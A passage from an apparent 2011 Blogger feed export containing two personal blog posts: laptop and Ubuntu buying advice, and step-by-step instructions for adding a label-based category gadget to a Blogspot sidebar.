Africa. But it's not that powerful (despite its 8 gb of memory); I
would need to change it within a year or two.<br />
<br />
My suggestion is to obtain a core i5 with nvidia GPU (From
Sony). My personal choice would be for a 16 inch high definition,
but I tend to like big screens more than most.<br />
<br />
Make sure you upgrade right away to the maximum memory possible.
Not doing so is not worth it: max it out! This means using a 64-bit
OS: you need 64-bit addressing to go over 4 GB of memory.<br />
<br />
You will want a good graphics card inside your laptop. I
recommend Nvidia based with at least 512 MB of <u>independent</u> memory,
preferably 1 GB with a recent GPU. I prefer Nvidia to the others,
especially with Ubuntu. That is what in my opinion makes the biggest
difference between the lower end and the higher end laptops. Macs
always have high end graphics cards.<br />
<br />
Ubuntu is a big jump! Congrats. The most recent version is
11.10. I use 11.04. Make sure you have the 64-bit version, and you
probably want to log in to the desktop edition (Gnome), not the netbook
edition (Unity). It's a combo box at login. <br />
<br />
I suggest you shop a little, perhaps on sony vaio's web site.
Compare with other companies also if you want. I'm not sure what are
the models these days...<br />
<br />
I stumbled upon this; it might help to compare laptops and get quite
good reviews on them. I wish I could find all models on this :)<br />
<br />
<a href="http://www.pcmag.com/products/compare/1565?aid=264717,289826,266527,264126" target="_blank">http://www.pcmag.com/products/compare/1565?aid=264717,289826,266527,264126</a><br />
<br />
This is a selection I made of very different laptop types. Hopefully comparing them will help you orient your search. <br />
---</div>Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com0tag:blogger.com,1999:blog-2722671667390463266.post-82034943518851585262011-11-19T08:34:00.001-08:002011-11-19T08:50:00.063-08:00How to add a custom category to the side bar on your blogspot blog, and populate it with links to selected posts<div dir="ltr" style="text-align: left;" trbidi="on">
In my side bar on this blog, I have a category called STATA, below which are links to all my posts that are about STATA tips (right now, I have only one such post). Here is a link to the page that gave me instructions on how to do this:<br />
<br />
<a href="http://www.bloggersentral.com/2010/04/list-recent-posts-by-label.html">http://www.bloggersentral.com/2010/04/list-recent-posts-by-label.html</a><br />
<br />
Basically, here's what you need to do:<br />
<br />
1. Pick a name for the category; this will be the same as the name of the label that you will apply to all posts that you want to include in the category. So your category could be something like (without the quotes): "STATA tips" (under this would be links to your posts related to tips on doing things in STATA) or "Books I am reading" (under this would be links to your posts that discuss the books you have been reading).<br />
<br />
2. In Blogger.com, click "Dashboard" and click posts to list all the posts for your blog. Create the label that you chose in step one and apply it to all the posts that you want to appear under this category.<br />
<br />
3. Click "Layout" in the left sidebar and select "Add Gadget." In some templates for blogger, you might have to click "Design." When you click "Add Gadget" a pop-up window will appear.<br />
<br />
4. In the left sidebar in this window, click the first tab, "Basics." Then scroll down and look for the Gadget "HTML/Javascript."<br />
<br />
From here you can follow the instructions available at the link above. The only thing I would do differently from the instructions at the link is that I would make the changes (e.g. replace YOUR_BLOG_URL, etc.) BEFORE saving, NOT after.<br />
<br />
Good luck!</div>Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com0